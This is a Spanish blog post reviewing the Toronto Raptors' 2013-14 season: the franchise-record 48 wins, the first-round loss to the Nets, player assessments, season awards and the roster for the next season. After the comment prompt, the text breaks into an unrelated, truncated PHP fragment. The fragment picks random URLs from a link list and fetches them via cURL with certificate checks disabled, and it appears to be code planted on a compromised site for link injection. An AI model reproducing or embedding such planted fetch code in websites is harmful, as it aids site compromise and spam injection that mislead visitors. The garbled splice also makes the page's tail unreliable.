Toronto Raptors: Notable

30 de July de 2014 por TheDeerHunter

48 victorias y terceros clasificados en el Este, la mejor marca de la historia de la franquicia. Nosotros pronosticamos un 41-41 y la entrada por los pelos a playoffs, eso antes de asistir al conato de tanking con el traspaso de Rudy Gay. Dwane Casey logró que los jugadores que se quedaron defendieran a muerte explotando la frescura de sus piernas al contragolpe y evitando complicados sistemas de ataque estático todo lo posible. Este sistema, unido al bajón general de nivel en la conferencia, se tradujó en grandes réditos durante la regular. En postemporada se toparon con la realidad de que más sabe el diablo por viejo que por diablo y la experiencia de un equipo de unos viejos zorros como los Nets les cortó las alas.

A toro pasado podemos comprobar que la plantilla con la que afrontaban los Raptors la 2013-14 era excesivamente corta. Tras el traspaso, Casey ha confiado apenas en 6-7 hombres, 3 de ellos incorporaciones a mitad de curso. Gente en teoría aprovechable como Hansbrough, Novak o Augustin no llegaron a contar mucho. Que un ex jugador en activo como John Salmons haya disfrutado de cierto protagonismo es algo que no dice demasiado de la planificación deportiva. Quizá la gestión de la plantilla no ha sido el mayor de los aciertos del técnico jefe. 

De los hombres clave hay que destacar la temporada All-Star de Demar DeRozan erigiéndose a sus 24 años como el mejor escolta de la conferencia este curso, aunque todavía ha sido mejor si cabe la de Kyle Lowry a pesar no obtener tanto reconocimiento. El base se convirtió en el verdadero líder del equipo y el director de orquesta ideal para los sistemas empleados. Ambos sufrieron demasiado, eso sí, ante el juego cansino y ralentizado que les impusieron los Nets en primera ronda y se notó bastante sus carencias a corregir. De todas maneras quien más sufrió el “paso de niño a hombre” de postemporada fue Terrence Ross, al que le vimos muy verde en el momento de la verdad. En cambio, jugadores como Greivis Vasquez y Patrick Patterson cuajaron una regular mediocre y unos playoffs muy interesantes.  Jonas Valanciunas y Amir Johnson han rendido correctamente, sin más, aunque en el caso del primero se ha notado una importante mejora respecto a su año de rookie.

Así, sin grandes mimbres y sin una campaña bestialmente brillante de la mayoría se han firmado unos resultados difíciles de mejorar y con escasos precedentes por aquellos lares. Quedó un cierto sabor amargo tras la eliminación ante los Nets, hasta cierto punto lógica. No hay que olvidar que resistieron hasta el 7º, con un punto de mala suerte en la derrota. El techo de este equipo hubiera sido, en el mejor de los casos, una semifinal de conferencia que probablemente merecieron, pero más por deméritos ajenos que por potencial real propio. La apuesta por la continuidad debe asumir este hecho, a no ser que se fíen los objetivos a un desarrollo de los jóvenes aún mayor que el curso pasado, cosa no especialmente probable.

PREMIOS

MVP: DeMar DeRozan supo recoger el testigo dejado por Gay como primer espada del equipo, mejorando las prestaciones de este último en Canadá y convirtiéndose en uno de los mejores escoltas de la liga. Sin embargo, el hombre más importante del equipo ha sido probablemente Kyle Lowry. Confieso que en playoffs llegó a desesperarme pero en la regular ha sido indiscutiblemente uno de los mejores bases del año. Así se lo han reconocido en el nuevo contrato.

Sorpresa: Que John Salmons haya llegado a disfrutar de casi 22 minutos por partido. Verle jugar ha sido un dolor. En el plano positivo, Patrick Patterson ha recuperado sensaciones tras su olvidable paso por Sacramento, especialmente en playoffs.

Decepción: Colapso casi total de Terrence Ross ante Nets, quizá uno de los principales culpables de la derrota. No obstante no hay que olvidar el buen papel que tuvo toda la regular y que no le pesó demasiado la titularidad. Más decepcionante es el mínimo protagonismo de nombres de cierta relevancia como Tyler Hansbrough, Landry Fields, Steve Novak, Nando De Colo… especialmente reseñable el caso de DJ Augustin que pasó de ser un marginado en este equipo a rozar el premio de mejor 6º hombre del año en Chicago.

Esfuerzo en vano: Por una vez, queda desierto.

JUGANDO A GM

A falta de cerrar la adquisición de Lucas Nogueira la plantilla para el nuevo curso está prácticamente cerrada sin apenas diferencias con la anterior.  Aunque parezca extraño podemos entender el conservadurismo que han mostrado los canadienses. El equipo ha rendido bien y se le puede dar continuidad, sin grandes aspiraciones inmediatas. Además el próximo año se libera una cantidad significativa de salario que podría convertirse en dos buenos agentes libres para aspirar a todo.

Nos ha extrañado, si acaso, la elección un tanto excéntrica de Bruno Caboclo en primera ronda. Quizá Ujiri vio algo que los demás no vimos… o directamente le gusta vacilar al personal.

A falta quizá de fichar algún base veterano más, así queda la plantilla salvo sorpresas:

PG: Kyle Lowry, Greivis Vasquez
SG: Terrence Ross, Louis Williams
SF: DeMar DeRozan, Landry Fields, James Johnson, Bruno Caboclo
PF: Amir Johnson, Patrick Patterson, Tyler Hansbrough
C: Jonas Valanciunas, Lucas Nogueira, Chuck Hayes

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>